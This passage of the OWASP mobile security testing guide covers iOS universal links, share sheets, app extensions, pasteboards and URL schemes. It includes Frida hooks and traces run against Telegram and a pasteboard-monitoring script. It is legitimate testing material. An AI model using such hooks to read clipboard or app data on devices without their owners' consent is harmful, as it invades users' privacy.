You can see that only one function was found and is being instrumented. Now trigger the universal link and observe the traces.
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n
You can observe that the function is in fact being called. You can now add code to the stubs in __handlers__/
to obtain more details:
// __handlers__/__AppDelegate_application_contin_8e36bbb1.js\n\n onEnter: function (log, args, state) {\n log(\"-[AppDelegate application: \" + args[2] + \" continueUserActivity: \" + args[3] +\n \" restorationHandler: \" + args[4] + \"]\");\n log(\"\\tapplication: \" + ObjC.Object(args[2]).toString());\n log(\"\\tcontinueUserActivity: \" + ObjC.Object(args[3]).toString());\n log(\"\\t\\twebpageURL: \" + ObjC.Object(args[3]).webpageURL().toString());\n log(\"\\t\\tactivityType: \" + ObjC.Object(args[3]).activityType().toString());\n log(\"\\t\\tuserInfo: \" + ObjC.Object(args[3]).userInfo().toString());\n log(\"\\trestorationHandler: \" +ObjC.Object(args[4]).toString());\n },\n
The new output is:
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298382 ms application:<Application: 0x10556b3c0>\n298382 ms continueUserActivity:<NSUserActivity: 0x1c4237780>\n298382 ms webpageURL:http://t.me/addstickers/radare\n298382 ms activityType:NSUserActivityTypeBrowsingWeb\n298382 ms userInfo:{\n}\n298382 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n
Apart from the function parameters we have added more information by calling some methods from them to get more details, in this case about the NSUserActivity
. If we look in the Apple Developer Documentation we can see what else we can call from this object.
If you want to know more about which function actually opens the URL and how the data is actually being handled you should keep investigating.
Extend the previous command in order to find out if there are any other functions involved in opening the URL.
frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\n
-i
includes any method. You can also use a glob pattern here (e.g. -i \"*open*Url*\"
means \"include any function containing 'open', then 'Url' and something else\")
Again, we first let frida-trace generate the stubs in __handlers__/
:
$ frida-trace -U Telegram -m \"*[* *restorationHandler*]\" -i \"*open*Url*\"\nInstrumenting functions...\n-[AppDelegate application:continueUserActivity:restorationHandler:]\n$S10TelegramUI0A19ApplicationBindingsC16openUniversalUrlyySS_AA0ac4OpenG10Completion...\n$S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData18application...\n$S10TelegramUI31AuthorizationSequenceControllerC7account7strings7openUrl5apiId0J4HashAC0A4Core19...\n...\n
Now you can see a long list of functions but we still don't know which ones will be called. Trigger the universal link again and observe the traces.
/* TID 0x303 */\n298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298619 ms | $S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData\n 18applicationContext20navigationController12dismissInputy0A4Core7AccountC_AA\n 14OpenURLContextOSSSbAA012PresentationK0CAA0a11ApplicationM0C7Display0\n 10NavigationO0CSgyyctF()\n
Apart from the Objective-C method, now there is one Swift function that is also of interest.
There is probably no documentation for that Swift function but you can just demangle its symbol using swift-demangle
via xcrun
:
xcrun can be used to invoke Xcode developer tools from the command-line, without having them in the path. In this case it will locate and run swift-demangle, an Xcode tool that demangles Swift symbols.
$ xcrun swift-demangle S10TelegramUI15openExternalUrl7account7context3url05forceD016presentationData\n18applicationContext20navigationController12dismissInputy0A4Core7AccountC_AA14OpenURLContextOSSSbAA0\n12PresentationK0CAA0a11ApplicationM0C7Display010NavigationO0CSgyyctF\n
Resulting in:
---> TelegramUI.openExternalUrl(\n account: TelegramCore.Account, context: TelegramUI.OpenURLContext, url: Swift.String,\n forceExternal: Swift.Bool, presentationData: TelegramUI.PresentationData,\n applicationContext: TelegramUI.TelegramApplicationContext,\n navigationController: Display.NavigationController?, dismissInput: () -> ()) -> ()\n
This not only gives you the class (or module) of the method, its name and the parameters but also reveals the parameter types and return type, so in case you need to dive deeper now you know where to start.
For now we will use this information to properly print the parameters by editing the stub file:
// __handlers__/TelegramUI/_S10TelegramUI15openExternalUrl7_b1a3234e.js\n\n onEnter: function (log, args, state) {\n\n log(\"TelegramUI.openExternalUrl(account: TelegramCore.Account,\n context: TelegramUI.OpenURLContext, url: Swift.String, forceExternal: Swift.Bool,\n presentationData: TelegramUI.PresentationData,\n applicationContext: TelegramUI.TelegramApplicationContext,\n navigationController: Display.NavigationController?, dismissInput: () -> ()) -> ()\");\n log(\"\\taccount: \" + ObjC.Object(args[0]).toString());\n log(\"\\tcontext: \" + ObjC.Object(args[1]).toString());\n log(\"\\turl: \" + ObjC.Object(args[2]).toString());\n log(\"\\tpresentationData: \" + args[3]);\n log(\"\\tapplicationContext: \" + ObjC.Object(args[4]).toString());\n log(\"\\tnavigationController: \" + ObjC.Object(args[5]).toString());\n },\n
This way, the next time we run it we get a much more detailed output:
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298382 ms application:<Application: 0x10556b3c0>\n298382 ms continueUserActivity:<NSUserActivity: 0x1c4237780>\n298382 ms webpageURL:http://t.me/addstickers/radare\n298382 ms activityType:NSUserActivityTypeBrowsingWeb\n298382 ms userInfo:{\n}\n298382 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n\n298619 ms | TelegramUI.openExternalUrl(account: TelegramCore.Account,\ncontext: TelegramUI.OpenURLContext, url: Swift.String, forceExternal: Swift.Bool,\npresentationData: TelegramUI.PresentationData, applicationContext:\nTelegramUI.TelegramApplicationContext, navigationController: Display.NavigationController?,\ndismissInput: () -> ()) -> ()\n298619 ms | account: TelegramCore.Account\n298619 ms | context: nil\n298619 ms | url: http://t.me/addstickers/radare\n298619 ms | presentationData: 0x1c4e40fd1\n298619 ms | applicationContext: nil\n298619 ms | navigationController: TelegramUI.PresentationData\n
There you can observe the following:
application:continueUserActivity:restorationHandler:
from the app delegate as expected.application:continueUserActivity:restorationHandler:
handles the URL but does not open it, it calls TelegramUI.openExternalUrl
for that.https://t.me/addstickers/radare
You can now keep going and try to trace and verify how the data is being validated. For example, if you have two apps that communicate via universal links you can use this to see if the sending app is leaking sensitive data by hooking these methods in the receiving app. This is especially useful when you don't have the source code as you will be able to retrieve the full URL that you wouldn't see otherwise as it might be the result of clicking some button or triggering some functionality.
In some cases, you might find data in userInfo
of the NSUserActivity
object. In the previous case there was no data being transferred but it might be the case for other scenarios. To see this, be sure to hook the userInfo
property or access it directly from the continueUserActivity
object in your hook (e.g. by adding a line like this log(\"userInfo:\" + ObjC.Object(args[3]).userInfo().toString());
).
Universal links and Apple's Handoff feature are related:
application:continueUserActivity:restorationHandler:\n
com.apple.developer.associated-domains
entitlement and in the server's apple-app-site-association
file (in both cases via the keyword \"activitycontinuation\":
). See \"Retrieving the Apple App Site Association File\" above for an example.Actually, the previous example in \"Checking How the Links Are Opened\" is very similar to the \"Web Browser-to-Native App Handoff\" scenario described in the \"Handoff Programming Guide\":
If the user is using a web browser on the originating device, and the receiving device is an iOS device with a native app that claims the domain portion of the webpageURL
property, then iOS launches the native app and sends it an NSUserActivity
object with an activityType
value of NSUserActivityTypeBrowsingWeb
. The webpageURL
property contains the URL the user was visiting, while the userInfo
dictionary is empty.
In the detailed output above you can see that NSUserActivity
object we've received meets exactly the mentioned points:
298382 ms -[AppDelegate application:0x10556b3c0 continueUserActivity:0x1c4237780\n restorationHandler:0x16f27a898]\n298382 ms application:<Application: 0x10556b3c0>\n298382 ms continueUserActivity:<NSUserActivity: 0x1c4237780>\n298382 ms webpageURL:http://t.me/addstickers/radare\n298382 ms activityType:NSUserActivityTypeBrowsingWeb\n298382 ms userInfo:{\n}\n298382 ms restorationHandler:<__NSStackBlock__: 0x16f27a898>\n
This knowledge should help you when testing apps supporting Handoff.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/","title":"Testing UIActivity Sharing","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#static-analysis","title":"Static Analysis","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#sending-items","title":"Sending Items","text":"When testing UIActivity
Sharing you should pay special attention to:
Data sharing via UIActivity
works by creating a UIActivityViewController
and passing it the desired items (URLs, text, a picture) on init(activityItems: applicationActivities:)
.
As we mentioned before, it is possible to exclude some of the sharing mechanisms via the controller's excludedActivityTypes
property. It is highly recommended to do the tests using the latest versions of iOS as the number of activity types that can be excluded can increase. The developers have to be aware of this and explicitly exclude the ones that are not appropriate for the app data. Some activity types might not be even documented like \"Create Watch Face\".
If having the source code, you should take a look at the UIActivityViewController
:
init(activityItems:applicationActivities:)
method.excludedActivityTypes
, if any.If you only have the compiled/installed app, try searching for the previous method and property, for example:
$ rabin2 -zq Telegram\\ X.app/Telegram\\ X | grep -i activityItems\n0x1000df034 45 44 initWithActivityItems:applicationActivities:\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#receiving-items","title":"Receiving Items","text":"When receiving items, you should check:
application:openURL:options:
(or its deprecated version UIApplicationDelegate application:openURL:sourceApplication:annotation:
) in the app delegate.If not having the source code you can still take a look into the Info.plist
file and search for:
UTExportedTypeDeclarations
/UTImportedTypeDeclarations
if the app declares exported/imported custom document types.CFBundleDocumentTypes
to see if the app specifies any document types that it can open.A very complete explanation about the use of these keys can be found on Stackoverflow.
Let's see a real-world example. We will take a File Manager app and take a look at these keys. We used objection here to read the Info.plist
file.
objection --gadget SomeFileManager run ios plist cat Info.plist\n
Note that this is the same as if we would retrieve the IPA from the phone or accessed via e.g. SSH and navigated to the corresponding folder in the IPA / app sandbox. However, with objection we are just one command away from our goal and this can be still considered static analysis.
The first thing we noticed is that app does not declare any imported custom document types but we could find a couple of exported ones:
UTExportedTypeDeclarations = (\n {\n UTTypeConformsTo = (\n \"public.data\"\n );\n UTTypeDescription = \"SomeFileManager Files\";\n UTTypeIdentifier = \"com.some.filemanager.custom\";\n UTTypeTagSpecification = {\n \"public.filename-extension\" = (\n ipa,\n deb,\n zip,\n rar,\n tar,\n gz,\n ...\n key,\n pem,\n p12,\n cer\n );\n };\n }\n);\n
The app also declares the document types it opens as we can find the key CFBundleDocumentTypes
:
CFBundleDocumentTypes = (\n {\n ...\n CFBundleTypeName = \"SomeFileManager Files\";\n LSItemContentTypes = (\n \"public.content\",\n \"public.data\",\n \"public.archive\",\n \"public.item\",\n \"public.database\",\n \"public.calendar-event\",\n ...\n );\n }\n);\n
We can see that this File Manager will try to open anything that conforms to any of the UTIs listed in LSItemContentTypes
and it's ready to open files with the extensions listed in UTTypeTagSpecification/\"public.filename-extension\"
. Please take a note of this because it will be useful if you want to search for vulnerabilities when dealing with the different types of files when performing dynamic analysis.
There are three main things you can easily inspect by performing dynamic instrumentation:
activityItems
: an array of the items being shared. They might be of different types, e.g. one string and one picture to be shared via a messaging app.applicationActivities
: an array of UIActivity
objects representing the app's custom services.excludedActivityTypes
: an array of the Activity Types that are not supported, e.g. postToFacebook
.To achieve this you can do two things:
init(activityItems: applicationActivities:)
) to get the activityItems
and applicationActivities
.excludedActivityTypes
property.Let's see an example using Telegram to share a picture and a text file. First prepare the hooks, we will use the Frida REPL and write a script for this:
Interceptor.attach(\nObjC.classes.\n UIActivityViewController['- initWithActivityItems:applicationActivities:'].implementation, {\n onEnter: function (args) {\n\n printHeader(args)\n\n this.initWithActivityItems = ObjC.Object(args[2]);\n this.applicationActivities = ObjC.Object(args[3]);\n\n console.log(\"initWithActivityItems: \" + this.initWithActivityItems);\n console.log(\"applicationActivities: \" + this.applicationActivities);\n\n },\n onLeave: function (retval) {\n printRet(retval);\n }\n});\n\nInterceptor.attach(\nObjC.classes.UIActivityViewController['- excludedActivityTypes'].implementation, {\n onEnter: function (args) {\n printHeader(args)\n },\n onLeave: function (retval) {\n printRet(retval);\n }\n});\n\nfunction printHeader(args) {\n console.log(Memory.readUtf8String(args[1]) + \" @ \" + args[1])\n};\n\nfunction printRet(retval) {\n console.log('RET @ ' + retval + ': ' );\n try {\n console.log(new ObjC.Object(retval).toString());\n } catch (e) {\n console.log(retval.toString());\n }\n};\n
You can store this as a JavaScript file, e.g. inspect_send_activity_data.js
and load it like this:
frida -U Telegram -l inspect_send_activity_data.js\n
Now observe the output when you first share a picture:
[*] initWithActivityItems:applicationActivities: @ 0x18c130c07\ninitWithActivityItems: (\n \"<UIImage: 0x1c4aa0b40> size {571, 264} orientation 0 scale 1.000000\"\n)\napplicationActivities: nil\nRET @ 0x13cb2b800:\n<UIActivityViewController: 0x13cb2b800>\n\n[*] excludedActivityTypes @ 0x18c0f8429\nRET @ 0x0:\nnil\n
and then a text file:
[*] initWithActivityItems:applicationActivities: @ 0x18c130c07\ninitWithActivityItems: (\n \"<QLActivityItemProvider: 0x1c4a30140>\",\n \"<UIPrintInfo: 0x1c0699a50>\"\n)\napplicationActivities: (\n)\nRET @ 0x13c4bdc00:\n<_UIDICActivityViewController: 0x13c4bdc00>\n\n[*] excludedActivityTypes @ 0x18c0f8429\nRET @ 0x1c001b1d0:\n(\n \"com.apple.UIKit.activity.MarkupAsPDF\"\n)\n
You can see that:
UIImage
and there are no excluded activities.com.apple.UIKit.activity. MarkupAsPDF
is excluded.In the previous example, there were no custom applicationActivities
and only one excluded activity. However, to better illustrate what you can expect from other apps we have shared a picture using another app, here you can see a bunch of application activities and excluded activities (output was edited to hide the name of the originating app):
[*] initWithActivityItems:applicationActivities: @ 0x18c130c07\ninitWithActivityItems: (\n \"<SomeActivityItemProvider: 0x1c04bd580>\"\n)\napplicationActivities: (\n \"<SomeActionItemActivityAdapter: 0x141de83b0>\",\n \"<SomeActionItemActivityAdapter: 0x147971cf0>\",\n \"<SomeOpenInSafariActivity: 0x1479f0030>\",\n \"<SomeOpenInChromeActivity: 0x1c0c8a500>\"\n)\nRET @ 0x142138a00:\n<SomeActivityViewController: 0x142138a00>\n\n[*] excludedActivityTypes @ 0x18c0f8429\nRET @ 0x14797c3e0:\n(\n \"com.apple.UIKit.activity.Print\",\n \"com.apple.UIKit.activity.AssignToContact\",\n \"com.apple.UIKit.activity.SaveToCameraRoll\",\n \"com.apple.UIKit.activity.CopyToPasteboard\",\n)\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0071/#receiving-items_1","title":"Receiving Items","text":"After performing the static analysis you would know the document types that the app can open and if it declares any custom document types and (part of) the methods involved. You can use this now to test the receiving part:
application:openURL:options:
and any other methods that were identified in a previous static analysis.To illustrate this with an example we have chosen the same real-world file manager app from the static analysis section and followed these steps:
As there is no default app that will open the file, it switches to the Open with... popup. There, we can select the app that will open our file. The next screenshot shows this (we have modified the display name using Frida to conceal the app's real name):
After selecting SomeFileManager we can see the following:
(0x1c4077000) -[AppDelegate application:openURL:options:]\napplication: <UIApplication: 0x101c00950>\nopenURL: file:///var/mobile/Library/Application%20Support\n /Containers/com.some.filemanager/Documents/Inbox/OWASP_MASVS.pdf\noptions: {\n UIApplicationOpenURLOptionsAnnotationKey = {\n LSMoveDocumentOnOpen = 1;\n };\n UIApplicationOpenURLOptionsOpenInPlaceKey = 0;\n UIApplicationOpenURLOptionsSourceApplicationKey = \"com.apple.sharingd\";\n \"_UIApplicationOpenURLOptionsSourceProcessHandleKey\" = \"<FBSProcessHandle: 0x1c3a63140;\n sharingd:605; valid: YES>\";\n}\n0x18c7930d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n...\n0x1857cdc34 FrontBoardServices!-[FBSSerialQueue _performNextFromRunLoopSource]\nRET: 0x1\n
As you can see, the sending application is com.apple.sharingd
and the URL's scheme is file://
. Note that once we select the app that should open the file, the system already moved the file to the corresponding destination, that is to the app's Inbox. The apps are then responsible for deleting the files inside their Inboxes. This app, for example, moves the file to /var/mobile/Documents/
and removes it from the Inbox.
(0x1c002c760) -[XXFileManager moveItemAtPath:toPath:error:]\nmoveItemAtPath: /var/mobile/Library/Application Support/Containers\n /com.some.filemanager/Documents/Inbox/OWASP_MASVS.pdf\ntoPath: /var/mobile/Documents/OWASP_MASVS (1).pdf\nerror: 0x16f095bf8\n0x100f24e90 SomeFileManager!-[AppDelegate __handleOpenURL:]\n0x100f25198 SomeFileManager!-[AppDelegate application:openURL:options:]\n0x18c7930d8 UIKit!__58-[UIApplication _applicationOpenURLAction:payload:origin:]_block_invoke\n...\n0x1857cd9f4 FrontBoardServices!__FBSSERIALQUEUE_IS_CALLING_OUT_TO_A_BLOCK__\nRET: 0x1\n
If you look at the stack trace, you can see how application:openURL:options:
called __handleOpenURL:
, which called moveItemAtPath:toPath:error:
. Notice that we have now this information without having the source code for the target app. The first thing that we had to do was clear: hook application:openURL:options:
. Regarding the rest, we had to think a little bit and come up with methods that we could start tracing and are related to the file manager, for example, all methods containing the strings \"copy\", \"move\", \"remove\", etc. until we have found that the one being called was moveItemAtPath:toPath:error:
.
A final thing worth noticing here is that this way of handling incoming files is the same for custom URL schemes. Please refer to the \"Testing Custom URL Schemes\" section for more information.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/","title":"Testing App Extensions","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#static-analysis","title":"Static Analysis","text":"The static analysis will take care of:
If you have the original source code you can search for all occurrences of NSExtensionPointIdentifier
with Xcode (cmd+shift+f) or take a look into \"Build Phases / Embed App extensions\":
There you can find the names of all embedded app extensions followed by .appex
, now you can navigate to the individual app extensions in the project.
If not having the original source code:
Grep for NSExtensionPointIdentifier
among all files inside the app bundle (IPA or installed app):
$ grep -nr NSExtensionPointIdentifier Payload/Telegram\\ X.app/\nBinary file Payload/Telegram X.app//PlugIns/SiriIntents.appex/Info.plist matches\nBinary file Payload/Telegram X.app//PlugIns/Share.appex/Info.plist matches\nBinary file Payload/Telegram X.app//PlugIns/NotificationContent.appex/Info.plist matches\nBinary file Payload/Telegram X.app//PlugIns/Widget.appex/Info.plist matches\nBinary file Payload/Telegram X.app//Watch/Watch.app/PlugIns/Watch Extension.appex/Info.plist matches\n
You can also access per SSH, find the app bundle and list all inside PlugIns (they are placed there by default) or do it with objection:
ph.telegra.Telegraph on (iPhone: 11.1.2) [usb] # cd PlugIns\n /var/containers/Bundle/Application/15E6A58F-1CA7-44A4-A9E0-6CA85B65FA35/\n Telegram X.app/PlugIns\n\nph.telegra.Telegraph on (iPhone: 11.1.2) [usb] # ls\nNSFileType Perms NSFileProtection Read Write Name\n------------ ------- ------------------ ------ ------- -------------------------\nDirectory 493 None True False NotificationContent.appex\nDirectory 493 None True False Widget.appex\nDirectory 493 None True False Share.appex\nDirectory 493 None True False SiriIntents.appex\n
We can see now the same four app extensions that we saw in Xcode before.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#determining-the-supported-data-types","title":"Determining the Supported Data Types","text":"This is important for data being shared with host apps (e.g. via Share or Action Extensions). When the user selects some data type in a host app and it matches the data types defined here, the host app will offer the extension. It is worth noticing the difference between this and data sharing via UIActivity
where we had to define the document types, also using UTIs. An app does not need to have an extension for that. It is possible to share data using only UIActivity
.
Inspect the app extension's Info.plist
file and search for NSExtensionActivationRule
. That key specifies the data being supported as well as e.g. maximum of items supported. For example:
<key>NSExtensionAttributes</key>\n <dict>\n <key>NSExtensionActivationRule</key>\n <dict>\n <key>NSExtensionActivationSupportsImageWithMaxCount</key>\n <integer>10</integer>\n <key>NSExtensionActivationSupportsMovieWithMaxCount</key>\n <integer>1</integer>\n <key>NSExtensionActivationSupportsWebURLWithMaxCount</key>\n <integer>1</integer>\n </dict>\n </dict>\n
Only the data types present here and not having 0
as MaxCount
will be supported. However, more complex filtering is possible by using a so-called predicate string that will evaluate the UTIs given. Please refer to the Apple App Extension Programming Guide for more detailed information about this.
Remember that app extensions and their containing apps do not have direct access to each other\u2019s containers. However, data sharing can be enabled. This is done via \"App Groups\" and the NSUserDefaults
API. See this figure from Apple App Extension Programming Guide:
As also mentioned in the guide, the app must set up a shared container if the app extension uses the NSURLSession
class to perform a background upload or download, so that both the extension and its containing app can access the transferred data.
It is possible to reject a specific type of app extension by using the following method:
application:shouldAllowExtensionPointIdentifier:
However, it is currently only possible for \"custom keyboard\" app extensions (and should be verified when testing apps handling sensitive data via the keyboard like e.g. banking apps).
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/#dynamic-analysis","title":"Dynamic Analysis","text":"For the dynamic analysis we can do the following to gain knowledge without having the source code:
For this we should hook NSExtensionContext - inputItems
in the data originating app.
Following the previous example of Telegram we will now use the \"Share\" button on a text file (that was received from a chat) to create a note in the Notes app with it:
If we run a trace, we'd see the following output:
(0x1c06bb420) NSExtensionContext - inputItems\n0x18284355c Foundation!-[NSExtension _itemProviderForPayload:extensionContext:]\n0x1828447a4 Foundation!-[NSExtension _loadItemForPayload:contextIdentifier:completionHandler:]\n0x182973224 Foundation!__NSXPCCONNECTION_IS_CALLING_OUT_TO_EXPORTED_OBJECT_S3__\n0x182971968 Foundation!-[NSXPCConnection _decodeAndInvokeMessageWithEvent:flags:]\n0x182748830 Foundation!message_handler\n0x181ac27d0 libxpc.dylib!_xpc_connection_call_event_handler\n0x181ac0168 libxpc.dylib!_xpc_connection_mach_event\n...\nRET: (\n\"<NSExtensionItem: 0x1c420a540> - userInfo:\n{\n NSExtensionItemAttachmentsKey = (\n \"<NSItemProvider: 0x1c46b30e0> {types = (\\n \\\"public.plain-text\\\",\\n \\\"public.file-url\\\"\\n)}\"\n );\n}\"\n)\n
Here we can observe that:
NSXPCConnection
that uses the libxpc.dylib
Framework.NSItemProvider
are public.plain-text
and public.file-url
, the latter being included in NSExtensionActivationRule
from the Info.plist
of the \"Share Extension\" of Telegram.You can also find out which app extension is taking care of the requests and responses by hooking NSExtension - _plugIn
:
We run the same example again:
(0x1c0370200) NSExtension - _plugIn\nRET: <PKPlugin: 0x1163637f0 ph.telegra.Telegraph.Share(5.3) 5B6DE177-F09B-47DA-90CD-34D73121C785\n1(2) /private/var/containers/Bundle/Application/15E6A58F-1CA7-44A4-A9E0-6CA85B65FA35\n/Telegram X.app/PlugIns/Share.appex>\n\n(0x1c0372300) -[NSExtension _plugIn]\nRET: <PKPlugin: 0x10bff7910 com.apple.mobilenotes.SharingExtension(1.5) 73E4F137-5184-4459-A70A-83\nF90A1414DC 1(2) /private/var/containers/Bundle/Application/5E267B56-F104-41D0-835B-F1DAB9AE076D\n/MobileNotes.app/PlugIns/com.apple.mobilenotes.SharingExtension.appex>\n
As you can see there are two app extensions involved:
Share.appex
is sending the text file (public.plain-text
and public.file-url
).com.apple.mobilenotes.SharingExtension.appex
which is receiving and will process the text file.If you want to learn more about what's happening under-the-hood in terms of XPC, we recommend taking a look at the internal calls from \"libxpc.dylib\". For example you can use frida-trace
and then dig deeper into the methods that you find more interesting by extending the automatically generated stubs.
The systemwide general pasteboard can be obtained by using generalPasteboard
, search the source code or the compiled binary for this method. Using the systemwide general pasteboard should be avoided when dealing with sensitive data.
Custom pasteboards can be created with pasteboardWithName:create:
or pasteboardWithUniqueName
. Verify if custom pasteboards are set to be persistent as this is deprecated since iOS 10. A shared container should be used instead.
In addition, the following can be inspected:
removePasteboardWithName:
, which invalidates an app pasteboard, freeing up all resources used by it (no effect for the general pasteboard).setItems:options:
with the UIPasteboardOptionLocalOnly
option.setItems:options:
with the UIPasteboardOptionExpirationDate
option.Hook or trace the following:
generalPasteboard
for the system-wide general pasteboard.pasteboardWithName:create:
and pasteboardWithUniqueName
for custom pasteboards.Hook or trace the deprecated setPersistent:
method and verify if it's being called.
When monitoring the pasteboards, there are several details that may be dynamically retrieved:
pasteboardWithName:create:
and inspecting its input parameters or pasteboardWithUniqueName
and inspecting its return value.string
method. Or use any of the other methods for the standard data types.numberOfItems
.hasImages
, hasStrings
, hasURLs
(starting in iOS 10).containsPasteboardTypes: inItemSet:
. You may inspect for more concrete data types like, for example, a picture as public.png and public.tiff (UTIs) or for custom data such as com.mycompany.myapp.mytype. Remember that, in this case, only those apps that declare knowledge of the type are able to understand the data written to the pasteboard. This is the same as we have seen in the \"UIActivity Sharing\" section. Retrieve them using itemSetWithPasteboardTypes:
and setting the corresponding UTIs.setItems:options:
and inspecting its options for UIPasteboardOptionLocalOnly
or UIPasteboardOptionExpirationDate
.If only looking for strings you may want to use objection's command ios pasteboard monitor
:
Hooks into the iOS UIPasteboard class and polls the generalPasteboard every 5 seconds for data. If new data is found, different from the previous poll, that data will be dumped to screen.
You may also build your own pasteboard monitor that monitors specific information as seen above.
For example, this script (inspired from the script behind objection's pasteboard monitor) reads the pasteboard items every 5 seconds, if there's something new it will print it:
const UIPasteboard = ObjC.classes.UIPasteboard;\n const Pasteboard = UIPasteboard.generalPasteboard();\n var items = \"\";\n var count = Pasteboard.changeCount().toString();\n\nsetInterval(function () {\n const currentCount = Pasteboard.changeCount().toString();\n const currentItems = Pasteboard.items().toString();\n\n if (currentCount === count) { return; }\n\n items = currentItems;\n count = currentCount;\n\n console.log('[* Pasteboard changed] count: ' + count +\n ' hasStrings: ' + Pasteboard.hasStrings().toString() +\n ' hasURLs: ' + Pasteboard.hasURLs().toString() +\n ' hasImages: ' + Pasteboard.hasImages().toString());\n console.log(items);\n\n }, 1000 * 5);\n
In the output we can see the following:
[* Pasteboard changed] count: 64 hasStrings: true hasURLs: false hasImages: false\n(\n {\n \"public.utf8-plain-text\" = hola;\n }\n)\n[* Pasteboard changed] count: 65 hasStrings: true hasURLs: true hasImages: false\n(\n {\n \"public.url\" = \"https://codeshare.frida.re/\";\n \"public.utf8-plain-text\" = \"https://codeshare.frida.re/\";\n }\n)\n[* Pasteboard changed] count: 66 hasStrings: false hasURLs: false hasImages: true\n(\n {\n \"com.apple.uikit.image\" = \"<UIImage: 0x1c42b23c0> size {571, 264} orientation 0 scale 1.000000\";\n \"public.jpeg\" = \"<UIImage: 0x1c44a1260> size {571, 264} orientation 0 scale 1.000000\";\n \"public.png\" = \"<UIImage: 0x1c04aaaa0> size {571, 264} orientation 0 scale 1.000000\";\n }\n)\n
You see that first a text was copied including the string \"hola\", after that a URL was copied and finally a picture was copied. Some of them are available via different UTIs. Other apps will consider these UTIs to allow pasting of this data or not.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/","title":"Testing Custom URL Schemes","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#static-analysis","title":"Static Analysis","text":"There are a couple of things that we can do using static analysis. In the next sections we will see the following:
The first step to test custom URL schemes is finding out whether an application registers any protocol handlers.
If you have the original source code and want to view registered protocol handlers, simply open the project in Xcode, go to the Info tab and open the URL Types section as presented in the screenshot below:
Also in Xcode you can find this by searching for the CFBundleURLTypes
key in the app\u2019s Info.plist
file (example from iGoat-Swift):
<key>CFBundleURLTypes</key>\n<array>\n <dict>\n <key>CFBundleURLName</key>\n <string>com.iGoat.myCompany</string>\n <key>CFBundleURLSchemes</key>\n <array>\n <string>iGoat</string>\n </array>\n </dict>\n</array>\n
In a compiled application (or IPA), registered protocol handlers are found in the file Info.plist
in the app bundle's root folder. Open it and search for the CFBundleURLSchemes
key, if present, it should contain an array of strings (example from iGoat-Swift):
grep -A 5 -nri urlsch Info.plist\nInfo.plist:45: <key>CFBundleURLSchemes</key>\nInfo.plist-46- <array>\nInfo.plist-47- <string>iGoat</string>\nInfo.plist-48- </array>\n
Once the URL scheme is registered, other apps can open the app that registered the scheme, and pass parameters by creating appropriately formatted URLs and opening them with the UIApplication openURL:options:completionHandler:
method.
Note from the App Programming Guide for iOS:
If more than one third-party app registers to handle the same URL scheme, there is currently no process for determining which app will be given that scheme.
This could lead to a URL scheme hijacking attack (see page 136 in [#thiel2]).
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-application-query-schemes-registration","title":"Testing Application Query Schemes Registration","text":"Before calling the openURL:options:completionHandler:
method, apps can call canOpenURL:
to verify that the target app is available. However, as this method was being used by malicious apps as a way to enumerate installed apps, from iOS 9.0 the URL schemes passed to it must also be declared by adding the LSApplicationQueriesSchemes
key to the app's Info.plist
file and an array of up to 50 URL schemes.
<key>LSApplicationQueriesSchemes</key>\n <array>\n <string>url_scheme1</string>\n <string>url_scheme2</string>\n </array>\n
canOpenURL
will always return NO
for undeclared schemes, whether or not an appropriate app is installed. However, this restriction only applies to canOpenURL
.
The openURL:options:completionHandler:
method will still open any URL scheme, even if the LSApplicationQueriesSchemes
array was declared, and return YES
/ NO
depending on the result.
As an example, Telegram declares in its Info.plist
these Queries Schemes, among others:
<key>LSApplicationQueriesSchemes</key>\n <array>\n <string>dbapi-3</string>\n <string>instagram</string>\n <string>googledrive</string>\n <string>comgooglemaps-x-callback</string>\n <string>foursquare</string>\n <string>here-location</string>\n <string>yandexmaps</string>\n <string>yandexnavi</string>\n <string>comgooglemaps</string>\n <string>youtube</string>\n <string>twitter</string>\n ...\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/#testing-url-handling-and-validation","title":"Testing URL Handling and Validation","text":"In order to determine how a URL path is built and validated, if you have the original source code, you can search for the following methods:
application:didFinishLaunchingWithOptions:
method or application:willFinishLaunchingWithOptions:
: verify how the decision is made and how the information about the URL is retrieved.application:openURL:options:
: verify how the resource is being opened, i.e. how the data is being parsed, verify the options, especially if access by the calling app (sourceApplication
) should be allowed or denied. The app might also need user permission when using the custom URL scheme.In Telegram you will find four different methods being used:
